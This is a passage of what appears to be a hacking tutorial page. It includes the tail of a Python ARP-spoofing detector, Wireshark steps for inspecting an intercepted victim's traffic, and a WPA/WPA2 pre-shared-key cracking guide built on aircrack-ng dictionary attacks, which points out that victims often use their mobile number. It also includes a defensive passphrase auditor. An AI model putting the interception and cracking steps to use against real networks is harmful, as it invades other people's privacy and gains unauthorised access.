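        ts, ip, mac = parse_arp_line(raw)

        # Heuristic 1: an IP's MAC binding flips. For the gateway this is the
        # classic man-in-the-middle symptom, so rate it HIGH.
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{ts} {sev}: {ip} changed from {prev} to {mac}")
        ip_to_mac[ip] = mac

        # Heuristic 2: one MAC answering for several IPs. Only alert when the
        # set of claimed IPs actually grows, so repeated replies stay quiet.
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                claimed = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(f"{ts} MEDIUM: {mac} claims {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_LOG, "192.168.1.1"):
        print(alert)
```

On the constructed log this produces three alerts: a HIGH one when the gateway’s MAC flips, a MEDIUM one when the client’s MAC flips, and a MEDIUM one when the new MAC is seen claiming both addresses. A real deployment would feed it ARP replies captured by a sniffer and pin the gateway’s MAC from a known-good baseline rather than from the first reply seen.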
Analysing the Packets:
Now that we have all this data streaming through our computer we need another piece of software to analyze it. This is where Wireshark comes in (http://www.wireshark.org/).
Wireshark is fairly basic to use. Install it and run it. Then click on the first icon on the second toolbar. Check the box with the most packets running through it and click start.
You should now have a stream of packets flowing through. There are countless things you can now analyse and view from your slave: you have all the data going to and from their computer. Viewing and analysing it can be simple or tricky, depending on what you’re trying to find out.
There’s plenty more information on how to use Wireshark on the Wireshark wiki (http://wiki.wireshark.org/).
From here you can develop your skills and further your knowledge of networking. This sheds light on how vulnerable our virtual privacy really is. It’s really not surprising that so many people regularly use software like VPNs and proxies.

Hacking WPA

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK; otherwise, it’s simply uncrackable (yet). But most networks do use PSK, so your chances are good. Before continuing, just take a look at what type of protection the network has.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63-character password composed of random characters including special symbols. This is because in this hack our only option is a dictionary attack, which means literally testing each and every word in a text file and checking whether it is the password. A simple Google search for “Dictionary attack list” will give you text files containing all the known words; pick the biggest one.
There is another important difference between cracking WPA/WPA2 and WEP, which is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs (more packets), as when cracking WEP encryption, does not speed up the attack. The only thing that gives enough information to start an attack is the handshake between the client and the AP, which takes place when the client connects to the network and attempts to authenticate. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack if the password is set to anything unusual, since even an 8-character password is almost impossible to brute-force.
This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
Also, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
There are pretty much no steps in this tutorial. All you need is the .cap file and a dictionary list.
Check out the WEP cracking tutorial, complete till step 10. Then you’ll have your .cap file which contains information about handshakes that aircrack uses to crack the key.
After you get the .cap file, open up Aircrack-ng. On the first screen, find and select your .cap file, select the WPA encryption option, and find and select your dictionary list. If the password is in the dictionary list, you’ll see the magic happen and the key will appear.
You can simply try googling for a dictionary wordlist; there are tons out there. Try as many as you can, and if possible compile several into one and let aircrack do its thing overnight. Again, cracking WPA/WPA2 is much harder, so you need probability on your side to have a real chance at getting the password.
I’ve noticed that in many cases, the WPA key is simply the mobile number of our naive victim. It’s usually 10 characters, easy to remember/type and luckily for us, relatively easy to crack.
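The section above makes the defender’s lesson clear: a PSK falls only if it is short, a dictionary word, or a predictable pattern such as a 10-digit mobile number, while a long random passphrase is out of reach of a dictionary attack. The following added example (my own code, not from the tutorial or from aircrack-ng) audits a candidate WPA passphrase against exactly those weaknesses and generates a 63-character random replacement. The tiny wordlist and the 60-bit threshold are constructed assumptions standing in for a real wordlist and a site policy.

```python
"""Audit a WPA/WPA2 pre-shared key for the weaknesses a dictionary attack exploits.

Added example, not part of the original tutorial. Checks: WPA length limits
(8-63 characters), the 10-digit phone-number pattern, membership in a wordlist,
and a brute-force entropy estimate based on the character classes used.
"""
import math
import secrets
import string

# Constructed mini wordlist; a real audit would load the same large lists the
# tutorial refers to.
SAMPLE_WORDLIST = {"password", "letmein", "dragon", "sunshine", "iloveyou", "football"}

# Assumed policy threshold: below this many bits of keyspace we call the key weak.
MIN_ENTROPY_BITS = 60


def charset_size(passphrase):
    """Size of the smallest standard alphabet that contains every character used."""
    size = 0
    if any(c.islower() for c in passphrase):
        size += 26
    if any(c.isupper() for c in passphrase):
        size += 26
    if any(c.isdigit() for c in passphrase):
        size += 10
    if any(c in string.punctuation for c in passphrase):
        size += len(string.punctuation)
    if " " in passphrase:
        size += 1
    return size


def audit_psk(passphrase, wordlist=SAMPLE_WORDLIST):
    """Return a report dict: entropy_bits, a list of findings, and a weak flag."""
    findings = []
    n = len(passphrase)
    if n < 8 or n > 63:
        findings.append("length outside the 8-63 characters WPA allows")
    if passphrase.isdigit() and n == 10:
        findings.append("looks like a 10-digit phone number")
    elif passphrase.isdigit():
        findings.append("digits only")
    if passphrase.lower() in wordlist:
        findings.append("found in wordlist")

    # Brute-force keyspace if the attacker knew only the character classes used.
    cs = charset_size(passphrase)
    bits = n * math.log2(cs) if cs else 0.0
    if bits < MIN_ENTROPY_BITS:
        findings.append(f"only {bits:.0f} bits of brute-force keyspace")

    return {"entropy_bits": round(bits, 1), "findings": findings, "weak": bool(findings)}


def generate_psk(length=63):
    """Random passphrase from printable ASCII, the strongest key WPA accepts."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for candidate in ("9876543210", "Password", "correct horse battery", generate_psk()):
        report = audit_psk(candidate)
        print(f"{candidate[:20]!r:24} weak={report['weak']} {report['findings']}")
```

The entropy figure is an upper bound on the attacker’s work, not a guarantee: a passphrase made of several dictionary words scores well on character count but still falls to a wordlist built from word combinations, which is why the wordlist check is kept separate from the keyspace check.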
(A tutorial on creating your own wordlists easily with ‘Crunch’ can be found in the Expert category)